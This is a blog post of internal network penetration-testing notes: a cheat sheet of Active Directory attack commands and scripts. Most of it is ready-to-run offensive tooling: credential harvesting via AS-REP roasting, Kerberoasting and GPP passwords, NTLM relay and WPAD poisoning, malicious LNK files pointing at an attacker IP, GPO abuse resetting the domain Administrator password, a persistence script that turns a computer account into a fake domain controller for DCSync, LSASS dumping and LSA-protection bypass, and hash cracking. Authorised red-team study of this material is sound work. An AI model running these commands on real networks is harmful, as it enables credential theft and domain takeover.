Internal Network Penetration Testing Notes

Hacking 101 Network Attack
by TechnoHerder : 2 Comments

Recon

Unauthenticated enumeration

whoami
systeminfo
hostname
whoami /priv
net users
net localgroup
findstr /spin "password"*.*
nslookup .
gpresult /R
set
echo %envar% (CMD)
$env:envar (PowerShell)
Get-WmiObject Win32_ComputerSystem
klist
klist tgt

PowerShelll port scan

0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(VICTIM_IP,$_)) "Port $_ is open!"} 2>$null

AD search GUI Copy dsquery.dll from C:\Windows\System32

rundll32 dsquery.dll,OpenqueryWindow

Unauthenticated User enumeration

User enumeration via Kerberos

–> Require list of possible usernames:

  • Non-existent account : KDC_ERR_C_PRINCIPAL_UNKNOWN
  • A locked or disabled account : KDC_ERR_CLIENT_REVOKED
  • A valid account : KDC_ERR_PREAUTH_REQUIRED

User enumeration without kerberos

Use the DsrGetDcNameEx2,CLDAP ping and NetBIOS MailSlot ping methods respectively to establish if any of the usernames in a provided text file exist on a remote domain controller.

First foothold

NAC Bypass (802.1x)

NAC (Network Access Control) acts as a kind of a gatekeeper to the local network infrastructure. Its usually works with whitelists, blacklists, authentication requirements or host scanning to restrict access and keep unwanted devices out of the network.

NAC can be setup using multiple measures:

  • Filtering of MAC addresses
  • Authentication with username & password
  • Authentication with certificates
  • Fingerprinting
  • Host checks

802.1x EAP-TLS

802.1x EAP-PEAP

Misc techniques

Sometimes trying different mac address such as MacOS device, Switch/Routers, Vmware VM can give you access or redirect you to specific VLAN without restriction.

Username == password

Using crackmapexec to test for password equal to username on domain contoso.com

for word in $(cat users.txt); do crackmapexec smb 10.10.0.10 -u $word -p $word -d contoso.com; done

SMB Version 1

crackmapexec smb all_ips.txt | grep -a "SMBv1:True" | cut -d " " -f 10

SMB Signing

crackmapexec smb all_ips.txt | grep -a "signing:False" | cut -d " " -f 10

Unsupported operating systems

crackmapexec smb all_ips.txt |  egrep -a "Windows 6.1|Server 2008|Server 2003|Windows 7|Server \(R\) 2008"

Checking NLA and other RDP issue

rdp-sec-check is a Perl script to enumerate the different security settings of an remote destktop service (AKA Terminal Services)

sudo cpan
cpan[1]> install Encoding::BER
rdp-sec-check.pl 10.0.0.93

RPC / SMB null enumeration

rpcclient -U '' -N 10.10.0.10 -c "querygroupmem 0x200" |  cut -d '[' -f 2 | cut -d ']' -f 1

AS-Rep Roasting

When a TGT request is made, the user must, by default, authenticate to the KDC in order for it to respond. Sometimes, this prior authentication is not requested for some accounts, allowing an attacker to abuse this configuration.

This configuration allows retrieving password hashes for users that have Do not require Kerberos preauthentication property selected:

python3 GetNPUsers.py COMPANY.LOCAL/ -usersfile /home/user/users.txt -request -dc-ip 192.168.0.10 -format hashcat
Rubeus.exe asreproast /domain:COMPANY.LOCAL /dc:192.168.0.10 /format:hashcat /outfile:asrep-roast.hashes
hashcat -m 18200 'asrep-roast.hashes' -a 0 ./wordlists/rockyou.txt

Authenticated enumeration

nltest /domain_trusts
nltest /trusted_domains
nltest /primary
nltest /sc_query:<domain>
nltest /dclist:<domain>
nltest /dsgetsite
nltest /whowill:<domain> <user>

Domain policy using PowerView

Get-DomainPolicy
(Get-DomainPolicy)."System Access"

Getting password policy

Get domain password policy using ActiveDirectory module. (RSAT)

Get-WindowsCapability -Name RSAT* -Online | Select-Object -Property DisplayName, State
Get-ADDefaultDomainPasswordPolicy

Get all domain fined grained password policy

Get-ADFinedGrainedPasswordPolicy -Filter *

Get password policy for specific user

Get-ADUserResultantPasswordPolicy -Identity john.doe

MISC Enumeration commands

Recursive search for Domain Admins members

dsquery group -name "Domain Admins" | dsget group -expand -members

Get Net session

Get-NetComputer | Get-NetSession

Active Directory user and computer account description

Using crackmapexec to get active directory user description

crackmapexec ldap 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M get-desc-users

–> It is also extremely important to check for computer account description, as computer account are just AD object with description attribute.

Resetting expired passwords remotely

PASSWD_NOT_REQD

If PASSWD_NOTREQD user-Account-Control Attribute Value bit is set then No password is required.

  1. First collect the information from the domain controller:
python ldapdomaindump.py -u example.com\\john -p pass123 -d ';' 10.100.20.1
  1. Once the dumping is done, get the list of users with the PASSWD_NOTREQD flag using the following command:
grep PASSWD_NOTREQD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'

Reset password of users who have PASSWD_NOTREQD flag set and have never set a password:

Get-ADUser -Filter "useraccountcontrol -band 32" -Properties PasswordLastSet | Where-Object { $_.PasswordLastSet -eq $null } | select SamAccountName,Name,distinguishedname | Out-GridView

Machine Account Quota

Identify machine account quota domain attribute:

crackmapexec ldap 192.168.0.10 -u jdoe -H XXXXXX:XXXXXXX -M MAQ --kdcHost corp.company.local
Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota

LAPS / LAPS bypass

Retrieving LAPS passwords using Crackmapexec

crackmapexec ldap 192.168.0.10 -u jdoe -H XXXXX:XXXXX -M laps --kdcHost corp.company.local

Admin Count

crackmapexec ldap company.com -u 'jdoe' -p 'Pass1234' -d company.com --admin-count

Checking GPP passwords

crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M gpp_password

Using Impackets Get-GPPPassword.py

python3 Get-GPPPassword.py company.com/jdoe:Pass1234@10.10.0.10

Using Metasploit module

use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts 192.168.0.10
msf auxiliary(smb_enum_gpp) > set smbuser jdoe
msf auxiliary(smb_enum_gpp) > set smbpass Pass1234
msf auxiliary(smb_enum_gpp) > exploit

Checking GPP autologin

crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M gpp_autologin

Checking share

Checking share access rights with domain user

crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com --shares

Complete review of network share permissions.
–> Powerhuntshare can be run from domain or non domain joined machine.

Running Powerhuntshare from domain joined machine.

Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test

Checking if print spooler service is enable using impacket RPCDUMP or crackmapexec (used RPCDUMP but can be used to scan on large range)

python3 rpcdump.py company.com/jdoe:Pass1234@10.10.0.10 | grep 'MS-RPRN\|MS-PAR'
crackmapexec smb rangeIP.txt -u jdoe -p Pass1234 -d company.com -M spooler | grep Spooler

Local admin brute force

Pywerview recon tool

PowerView’s functionalities in Python, using the wonderful impacket library.

python pywerview.py get-netuser -w company.local -u jdoe --dc-ip 192.168.0.10 --username jdoe

Recon/Enumeration using BloodHound

. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All

Expanding BloodHound

Exploitation

Identifying Quick Wins

  • Tomcat
  • JavaRMI
  • WebLogic
  • Jboss
nmap -p 8080,1098,1099,1050,8000,8888,8008,37471,40259,9010,7001 -iL ips.txt -oN tomcat_rmi_jboss.txt -sV

adPeas

Password spray

Spraying 3 password attempt for each user every 15 minutes without attempting password=username

spray.sh -smb 192.168.0.10 users.txt seasons.txt 3 15 corp.company.local NOUSERUSER

LNK Files

If you get access to a share we can create a malicious .LNK file. This .LNK file will includes a refernece to the attacker computers. You can after choose to Relay the NetNTLM hash or crack it.

lnkup.py --host attackerIP --type ntlm --output out.lnk --execute "shutdown /s"

Using PowerShell

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\Malicious.lnk")
$lnk.TargetPath = "\\<attackerIP>\@file.txt"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "LNK file"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

RPC Misc

AD user password modification using rpcclient
user@host # rpcclient -U supportAccount //192.168.0.100
[...] authenticate using the supportAccount password which needs to be modified
rpcclient $> setuserinfo2 supportAccount 23 SuperNewPassword22

–> Note : If package passing-the-hash is installed on attacker machine, you can even do this with just a NTLM hash. (Flag : –pw-nt-hash)

RPC password spraying
Using bash script:
#/bin/bash
for u in 'cat dom_users.txt'
do echo -n "[*] user: $u" && rpcclient -U "$u%password" -c "getusername;quit" 10.10.10.192
done

Kerberoasting

Service Principal Names (SPN’s) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service).

The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts.

GetUserSPNs.py -request -dc-ip 192.168.1.10 COMPANY.LOCAL/jdoe:PasswordJdoe123 -outputfile hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt

–> To protect against this attack, we must avoid having SPN on user accounts, in favor of machine accounts.
–> If it is necessary, we should use Microsoft’s Managed Service Accounts (MSA) feature, ensuring that the account password is robust and changed regularly and automatically

Abusing Vulnerable GPO

\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" --Author DOMAIN\<USER> --Command "cmd.exe" --Arguments "/c net user Administrator Password!@# /domain" --GPOName "ADDITIONAL DC CONFIGURATION"

Abusing MS-SQL Service

. ./PowerUPSQL.ps1
Get-SQLInstanceLocal -Verbose
(Get-SQLServerLinkCrawl -Verbose -Instance "10.10.10.20" -Query 'select * from master..sysservers').customquery 

Import-Module .\powercat.ps1 powercat -l -v -p 443 -t 10000

Relay attacks

Drop the MIC CVE-2019-1040

Exploiting ACL over GPO

Insecure LDAP: LDAPS / Signing / Channel Binding

Insecure LDAP traffic can exposed clients to multiple vulnerabilities and exploitation path such as:

  • Unencrypted LDAP (LDAPS) : Credential and authentication interception (port TCP-UDP/389)
  • LDAP Signing disable : LDAP Relay attack (such as SMB Relay but using LDAP)
  • LDAP Channel Binding :

LDAPS

Domain controllers and clients are in constant exchange and use the LDAP protocol, which communicates via port 389 (TCP and UDP).

In case a customer use LDAP (389) instead of LDAPS (636) you will be able to intercept authentication and credentials.

Why LDAPS is not deployed everywhere:

  • Not all devices are compatible with it (Old telephone systems or legacy applications)
  • Small

Note: If SSL is used you can try to make MITM offering a false certificate, if the user accepts it, you are able to Downgrade the authentication method and see the credentials again.

LDAP Signing disable

LDAP signing adds a digital signature to the connection. It ensures the authenticity and integrity of the transmitted data. This means that the recipient can verify the sender and determine whether the data has been manipulated along the way.

In case LDAP signing is not enable it is possible to relay a valid LDAP session using ntlmrelayx for example. The LDAP relay attack will give you the ability to perform multiple action such as :

  • Dumping LDAP information (ActiveDirectory users/groups/computers information)
  • In case the relayed session is from a Domain Admins user you will be able to directly persiste and create a new Domain Admins user.
  •  

Validate LDAP signing is not enforced

crackmapexec ldap domain_controllers.txt -u jdoe -p Password123 -M ldap-signing

LDAP Channel Binding

Channel binding is the act of binding the transport layer and application layer together. In the case of LDAP channel binding, the TLS tunnel and the LDAP application layer are being tied together. When these two layers are tied together it creates a unique fingerprint for the LDAP communication. Any interception of the LDAP communications cannot be re-used as this would require establishing a new TLS tunnel which would invalidate the LDAP communication’s unique fingerprint.

python3 LdapRelayScan.py -dc-ip 192.168.0.10 -u jdoe -p Password123

Unencrypted Protocols in use

SMTP

Port 25

HTTP

Port 80

Telnet

Port 23

FTP

Port 21

LDAP

LDAPS uses its own distinct network port to connect clients and servers. The default port for LDAP is port 389, but LDAPS uses port 636 and establishes TLS/SSL upon connecting with a client.

SYSVOL / GPP

From Windows client perspective

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

The PowerSploit function Get-GPPPassword is most useful for Group Policy Preference exploitation.

From Linux client

Metasploit Module
use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts 192.168.1.103
msf auxiliary(smb_enum_gpp) > set smbuser raj
msf auxiliary(smb_enum_gpp) > set smbpass Ignite@123
msf auxiliary(smb_enum_gpp) > exploit
Metasploit Post-Module : Once you get shell on windows host
use post/windows/gather/credentials/gpp
msf post(windows/gather/credentials/gpp) > set session 1
msf post(windows/gather/credentials/gpp) > exploit
CrackMapExec Module 1 : gpp_password

Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. Groups.xml, Services.xml, Scheduledtasks.xml, DataSources.xml, Printers.xml, Drives.xml

crackmapexec smb 192.168.0.10 -u jdoe -p Password 123 -M gpp_pasword
CrackMapExec Module 2: gpp_autologin

Searches the domain controller for registry.xml to find autologon information and returns the username and password.

crackmapexec smb 192.168.0.10 -u jdoe -p Password 123 -M gpp_autologin
Impacket Module

Breadth-first search algorithm to recursively find .xml extension files within SYSVOL.

Get-GPPPassword.py company.local/jdoe:Password123@192.168.0.10'
Decrypt the found password manually
gpp-decrypt <encrypted cpassword>

LLMNR / NBT-NS / mDNS

Microsoft systems use Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS) for local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementations use Multicast DNS (mDNS) to discover systems within a network.

Responder + ntlmrelayx

It is possible to directly relay NetNTLM has to SMB/LDAP/HTTP and DNS session over a victim. If the victim has SMB and/or LDAP signing activated try to relay on other protocols than SMB or LDAP.

Poisoning LLMNR/NetBios-NS response

python3 Responder.py -I eth0 -wbF

Relay over smb to 192.168.0.10, with smb2 support, socks enable, interactive mode and dumping the NetNTLM relayed hash in option

sudo ntlmrelayx.py -t 192.168.0.10 -i -socks -smb2support -debug --output-file ./netntlm.hashes.relay

WPAD

Many browsers use Web Proxy Auto-Discovery (WPAD) to load proxy settings from the network, download the wpad.dat, Proxy Auto-Config (PAC) file.

A WPAD server provides client proxy settings via a particular URL:

–> When a machine has these protocols enabled, if the local network DNS is not able to resolve the name, the machine will ask to all hosts of the network.

Using Responder we can poison DNS, DHCP, LLMNR and NBT-NS traffic to redirect clients to a malicious WPAD Server.

responder -I eth0 -wFb

–> Backdooring using Responder and WPAD attack Modify Responder configuration file

; Set to On to serve the custom HTML if the URL does not contain .exe
; Set to Off to inject the 'HTMLToInject' in web pages instead
Serve-Html = On

–> Create a specific web page for error or use the default one.

–> Create an implant to be downloaded by the client. By default the error message indicate this URL : http://isaProxysrv/ProxyClient.exe

–> Patch by Microsoft (MS16-077): Location of WPAD file is no longer requested via broadcast protocols bnut only via DNS.

WSUS

ACL / DACL Exploitation

ForceChangePassword

Returns the ACLs associated with jdoe user in DOMAIN.local domain and resolve GUIDs to their display names

Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "DOMAIN.local\jdoe"}
. .\PowerView.ps1
Set-DomainUserPassword -Identity User -Verbose

Using rpcclient

rpcclient -U jdoe 10.10.10.192
setuserinfo2 victimUser 23 'Pass123!'

MachineAccountQuota (MAQ)

MachineAccountQuota (MAQ) is a domain level attribute that by default permits unprivileged users to attach up to 10 computers to an Active Directory (AD) domain

Various tools exist which can create a machine account from the command line or from an implant such as StandIn, SharpMad and PowerMad.

  • Machine accounts created through MAQ are placed into the Domain Computers group –> In situations where the Domain Computers group has been granted extra privilege, it’s important to remember that this privilege also extends to unprivileged users through MAQ.
  • The creator account is granted write access to some machine account object attributes. Normally, this includes the following attributes:
  1. AccountDisabled
  2. description
  3. displayName
  4. DnsHostName
  5. ServicePrincipalName
  6. userParameters
  7. userAccountControl
  8. msDS-AdditionalDnsHostName
  9. msDS-AllowedToActOnBehalfOfOtherIdentity
  10. samAccountName
  • The machine account itself has write access to some of its own attributes. The list includes the msDS-SupportedEncryptionTypes attribute which can have an impact on the negotiated Kerberos encryption method.
  • The samAccountName can be changed to anything that doesn’t match a samAccountName already present in a domain. –> Interestingly, the samAccountName can even end in a space which permits mimicking any existing domain account. You can strip the $ character also.

Protected Users

Well-known SID/RID: S-1-5-21-<domain>-525

This group was introduced in Windows Server 2012 R2 domain controllers.

Get-ADGroupMember -Identity "Protected Users"
for group in $(rpcclient -U '' -N 10.10.0.10 -c enumdomgroups | grep Protected | cut -d '[' -f 3 | cut -d ']' -f 1); do rpcclient -U '' -N 10.10.0.10 -c "querygroupmem $group"; done

Protected users is a Security Group which aims to create additional protection against compromise of credential regarding its members, such as the followings:

  • Kerberos protocol will not use the weaker DES or RC4 encryption types in the preauthentication process
  • Credential delegation (CredSSP) will not cache the user’s plain text credentials
  • Windows Digest will not cache the user’s plain text credentials even when Windows Digest is enabled (From windows 8.1 and Server 2012 R2)
  • The user’s account cannot be delegated with Kerberos constrained or unconstrained delegation
  • Members of this group cannot use NTLM
  • Kerberos ticket-granting tickets (TGTs) lifetime = 4 hours

PAC

Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

ProxyLogon

ProxyShell

ZeroLogon

crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M zerologon

PrintNightmare

SpoolSample

https://github.com/leechristensen/SpoolSample

ShadowCoerce

https://github.com/ShutdownRepo/ShadowCoerce

DFSCoerce

https://github.com/Wh04m1001/DFSCoerce

MultiCoerce

Petitpotam

PetitPotam, publicly disclosed by French security researcher Lionel Gilles, is comparable to the PrintSpooler bug but utilizes the MS-EFSRPC API to coerce authentication rather than MS-RPRN.

Check to validate host is vulnerable to petitpotam

crackmapexec smb 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M petitpotam

samAccountName spoofing

MiTM – IPv6 + NTLMRelayx

Kerberos attacks

AS-Rep Roasting

Kerberoasting

MS14-066

Active Directory exploitation

ZeroLogon

Exploiting ADCS

Find PKI Enrollment Services in Active Directory and Certificate Templates Names

crackmapexec ldap 10.10.0.10 -u jdoe -p Pass1234 -d company.com -M adcs 
certutil.exe -config - -ping

ADCS

ADCS WebDav + NTLM relay to LDAP

Exploiting machine accounts (WS01$)

Every computer joined to Active Directory (AD) has an associated computer account in AD. A computer account in AD is a security principal (same as user accounts and security groups) and as such has a number of attributes that are the same as those found on user accounts including a Security IDentifier (SID), memberOf, lastlogondate, passwordlastset, etc.

  • Check the group membership for a machine account, sometime the machine account is member of elevated group or Domain Admins
Get-ADComputer -Filter * -Properties MemberOf | ? {$_.MemberOf}
net group "domain admins" /domain

Converting machine account Hex value to NTLM hash:

import hashlib,binascii hexpass = "e6 5f 92..."
hexpass = hexpass.replace(" ","")
passwd = hexpass.decode("hex")
hash = hashlib.new('md4', passwd).digest()
print binascii.hexlify(hash)

Over-Pass-The-hash

Use the user or computer NTLM hash to request Kerberos tickets. –> Alternative to Pass The hash over NTLM protocol
–> Useful in networks where NTLM protocol is disabled and only Kerberos is allowed.

getTGT.py domain.local/workstation1$ -hashes XXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXX -dc-ip 192.168.0.10 -debug
KRB5CCNAME=/home/test/lutzenfried/tooling/workstation1\$.ccache

Potential error when using Over Pass The Hash attack due to the Kerberos and time.

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

–> Error raised because of your local time, you need to synchronise the host with the DC: ntpdate <IP of DC>

Pass The ticket

Silver ticket

Kerberos Delegation

Check for system trusted for delegation

crackmapexec ldap 192.168.0.10 -u jdoe -p Password123 --trusted-for-delegation
OR
ldapdomaindump -u "company.local\\jdoe" -p "Password123" 192.168.0.10  
grep TRUSTED_FOR_DELEGATION domain_computers.grep
OR
PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}

Exploiting RBCD : MachineAccountQuota

Exploiting RBCD : WRITE Priv

From On-Premise to Azure

  • MSOL account
  • AzureAD Connect

Domain Trust

Forest Trust

Lateral movement

smbclient authentication using NTLM hash

smbclient //192.168.0.10/C$ -U corp.company.com/jdoe --pw-nt-hash <NT hash>

Persistence

Primary Group ID

The primary group id is a a user object attribute and contains relative identifier (RID) for the primary group of the user.
–> By default this is the RID for the Domain Users group (RID 513).

By using the Primary Group ID attribute and a specific Access Control Entry (ACE), an attacker can hide the membership of one group that he is already a member of without having any permissions on the group.

This cool trick cannot work on members of protected groups such as Domain Admins, but can work on members of normal groups such as DnsAdmins, which can be used to escalate to Domain Admins.

Dropping SPN on admin accounts

Sneaky Persistence Active Directory Trick #18: Dropping SPNs on Admin Accounts for Later Kerberoasting

Persistence in AD environment

Machine/Computer accounts

Machine accounts could be used as a backdoor for domain persistence by adding them to high privilege groups.

net group "Domain Admins" newMachine01$ /add /domain
python3 secretsdump.py company.local/newMachine01\$:Password123@10.0.0.1 -just-dc-user krbtgt

Machine/Computer accounts 2

Even though that dumping passwords hashes via the DCSync technique is not new and SOC teams might have proper alerting in place, using a computer account to perform the same technique might be a more stealthier approach.

Modification of the “userAccountControl” attribute can transform a computer account to a domain controller.

Computer account to appear as a domain controller:

  • userAccountControl attribute needs to have the value of 0x2000 = ( SERVER_TRUST_ACCOUNT ) decimal : 8192 –> Modification of this attribute requires domain administrator level privileges
Import-Module .\Powermad.psm1
New-MachineAccount -MachineAccount newMachine01 -Domain company.local -DomainController dc01.company.local

By default new computer will have primary group ID 515 (RID for domain groups and represents that this is a domain computer)

If you can modify the userAccountControl an therefore change the primary group ID. This attribute would be modified to have a value of 8192 the primary group id will change to 516 which belongs to domain controllers.

Set-ADComputer newMachine01 -replace @{ "userAccountcontrol" = 8192 }

Most important bit of having a computer account to act as a domain controller is that the DCSync can be used on that arbitrary account instead of the legitimate domain controller.

Steps:

  1. Creation a machine account
  2. Modifying userAccountControl to 8192
  3. Computer account is known its NTLM hash could be used to pass the hash (create new cmd.exe, mimikatz…)
  4. Command prompt will open under the context of the machine account –> DCSync KRBTG or whole identities
lsadump::dcsync /domain:purple.lab /user:krbtgt

Automate technique 1:

Add-ServerUntrustAccount -ComputerName "newMachine01" -Password "Password123" -Verbose
Invoke-ServerUntrustAccount -ComputerName "newMachine01" -Password "Password123" -MimikatzPath ".\mimikatz.exe"

Automate technique 2: PowerShell script to automate domain persistence via the userAccountControl active directory attribute.

function Execute-userAccountControl
{
[CmdletBinding()]
        param
        (
                [System.String]$DomainFQDN = $ENV:USERDNSDOMAIN,
                [System.String]$ComputerName = 'Pentestlab',
                [System.String]$OSVersion = '10.0 (18363)',
                [System.String]$OS = 'Windows 10 Enterprise',
                [System.String]$DNSName = "$ComputerName.$DomainFQDN",
$MachineAccount = 'Pentestlab'
        )
$secureString = convertto-securestring "Password123" -asplaintext -force
$VerbosePreference = "Continue"

Write-Verbose -Message "Creating Computer Account: $ComputerName"
New-ADComputer $ComputerName -AccountPassword $securestring -Enabled $true -OperatingSystem $OS -OperatingSystemVersion $OS_Version -DNSHostName
$DNSName -ErrorAction Stop;
Write-Verbose -Message "$ComputerName created!"
Write-Verbose -Message "Attempting to establish persistence."
Write-Verbose -Message "Changing the userAccountControl attribute of $MachineAccount computer to 8192."
Set-ADComputer $MachineAccount -replace @{ "userAccountcontrol" = 8192 };
Write-Verbose -Message "$MachineAccount is now a Domain Controller!"
Write-Verbose -Message "Domain persistence established!You can now use the DCSync technique with Pentestlab credentials."
$VerbosePreference = "Continue"
}

Post-Exploitation

Computer accounts privesc

For example, if an admin server is joined to a group with backup rights on Domain Controllers, all an attacker needs to do is compromise an admin account with rights to that admin server and then get System rights on that admin server to compromise the domain.

  1. Compromise an account with admin rights to admin server.
  2. Admin server computer account needs rights to Domain Controllers.

Active Directory NTDS : Clear Text passwords (Reversible encryption)

Sometimes when using secretsdump.py to extract NTDS.dit you will encounter some CLEARTEXT credential wihtin the dump.

Cleartext does not really mean that the passwords are stored as is. They are stored in an encrypted form using RC4 encryption.

The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin.This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”.

List users with “Store passwords using reversible encryption” enabled

Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

–> list of user account control flag :

DCSYNC

Accessing LSASS secrets

Lsassy
lsassy -d company.local -u jdoe -p Pass1234 192.168.1.0/24

Bring Your Own Domain Controller

Misc : AD Audit

WDigest

Wdigest was introduced in WinXP and designed to be used with HTTP protocol for authentication.

Enabled by default in multiple versions of Windows:

  • Windows XP
  • Windows 8.0
  • Server 2003
  • Server 2008
  • Server 2012

–> With WDigest plain text passwords are stored in LSASS.

Retrieving using Mimikatz

sekurlsa::wdigest

Can be deactivated/activated setting to 1 the value of UseLogonCredential and Negotiate in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest.
–> If these registry keys don’t exist or the value is “0”, then WDigest will be deactivated.

reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v Negotiate

As an attacker you can reactivate WDigest to get cleartext credentials on sensitive systems.

crackmapexec smb 192.168.0.10 -u jdoe -p Pass123 -M wdigest -o ACTION=enable
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Passwords stored in LSA (LSA Storage)

Since Windows 8.1 you can protect LSA storage using Protected Process (RunAsPPL).
–> This will prevent regular mimikatz.exe sekurlsa:logonpasswords for working properly.

With this registry key enable, the following 3 actions (which require an handle on LSASS ) will no longer be possible:

sekurlsa:logonpasswords
lsadump::lsa: Did not work
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlmhash>

With this registry key enable, the following 5 actions will still be possible:

lsadump::dcsync /domain:<domain> /user:<user>
lsadump::secrets (get syskey information to decrypt secrets from the registry on disk)
lsadump::sam (Reading credentials from the SAM on disk)
kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt hash> /endin:<value> /renewmax:<value>
keystroke logging

Validate RunAsPPL is enable

reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL

Documentation about LSA secrets: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23

–> Mimikatz has the mimidrv.sys driver that can bypass LSA Protection. Pretty much flag everywhere you will need to write you own driver. – https://posts.specterops.io/mimidrv-in-depth-4d273d19e148 –> You can also build your own driver and sign it digitally
–> You can also load an official and vulnerable driver that can be exploited to run arbitrary code in the Kernel
https://github.com/fengjixuchui/gdrv-loader
https://github.com/RedCursorSecurityConsulting/PPLKillerhttps://gorkemkaradeniz.medium.com/defeating-runasppl-utilizing-vulnerable-drivers-to-read-lsass-with-mimikatz-28f4b50b1de5 –> Use other process (e.g Antivirus process) which sometimes have already handles on LSASS process
https://skelsec.medium.com/duping-av-with-handles-537ef985eb03

Abusing leaked handles to dump LSASS memory

LM password storage

LM hash is an old deprecated method of storing passwords which has the following weaknesses:

  • Password length is limited to 14 characters
  • Passwords that are longer than 7 characters are split into two and each half is hashed separately
  • All lower-case characters are converted to upper-case before hashing
grep -iv ':aad3b435b51404eeaad3b435b51404ee:' ntds.dit

Storing passwords using reversible encryption

Inactive domain accounts

sort -t ';' -k 8 domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3, $8}'

Privileged users with password reset overdue

Once the dumping is done (ldapdomaindump), get the list of users with AdminCount attribute set to 1 by parsing the ‘domain_users.json’ file:

jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json > privileged_users.txt

Then iterate through the list of privileged users, display their last password reset date (pwdLastSet) and sort it:

while read user; do grep ";${user};" domain_users.grep; done < privileged_users.txt | \
  grep -v ACCOUNT_DISABLED | sort -t ';' -k 10 | awk -F ';' '{print $3, $10}'

Users with non-expiring passwords

grep DONT_EXPIRE_PASSWD domain_users.grep | grep -v ACCOUNT_DISABLED

Service account within privileged groups

net group "Schema Admins" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain

AdminCount on regular users

jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json

Data-Exfiltration

Data exfiltration and DLP (Data Loss Prevention) bypass.

Cracking Hashes

LM hash

hashcat -m 3000 -a 0 lm_hashes.txt ../../wordlists/rockyou_2021.txt

NTLM hash

Hashcat mask attack

hashcat -m 1000 -a 3 ntds.dit.ntds ?u?l?l?l?l?d?d?d?d?s

Hashcat rule based cracking

hashcat -m 1000 -a 0 --username ntds.dit.ntds ../../wordlists/rockyou_2021.txt -r ../../wordlists/OneRuleToRuleThemAll.rule

Hashcat wordlist cracking

hashcat -m 1000 -a 0 --username ntds.dit.ntds ../../wordlists/rockyou_2021.txt

Net-NTLMv1

hashcat -m 5500 -a 0 ntlmv1_hashes.txt ../../wordlists/rockyou_2021.txt

Net-NTLMv2

hashcat -m 5600 -a 0 ntlmv2_hashes.txt ../../wordlists/rockyou_2021.txt

AS-Rep Roast response (Kerberos 5 AS-REP etype 23)

hashcat -m 18200 -a 0 AS_REP_responses_hashes.txt ../../wordlists/rockyou_2021.txt

Kerberoast (Service Ticket)

hashcat -m 13100 -a 0 TGS_hashes.txt ../../wordlists/rockyou_2021.txt

Reporting / Collaborative

Password audit reporting

dpat.py -n ntds.dit -c hashcat.potfile -g "Domain Admins.txt" "Enterprise Admins.txt"

Defenses

Restricted Admin Mode

Windows Defender Antivirus

AppLocker

Rules: Are defined and control execution of the followings items:

  • Applications
  • Scripts
  • Packaged Applications
  • Installers
  • DLL

Conditions: Are based on the followings filters:

  • Publisher (Ex: Software signed by valid vendor)
  • Path
  • File hash

–> Finally : Allow and Deny actions can be assigned to specific user/group.

Windows Defender Application Control (WDAC)

Windows Defender Advanced Threat Protection (ATP)

Windows Defender : Exploit Guard

Windows Defender : Application Guard

Windows Defender : Device Guard

Windows Defender : Credential Guard

Resources

Red Team Cheatsheet

OCD – AD Mind Map

PetitPotam and ADCS

Active Directory Exploitation cheatsheet

Attacking Active Directory

Kerberos Delegation

Exceptional blog posts regarding Windows Authentication/Credentials/RDP

Windows Logon Types

Windows Name Pipes

COM / DCOM

PowerShell Without PowerShell

Tools:

LAPS, JEA, WSL, RBCD, WDAC, ASR, AWL, Credential Guard, CLM, virtualization

2 thoughts on “Internal Network Penetration Testing Notes

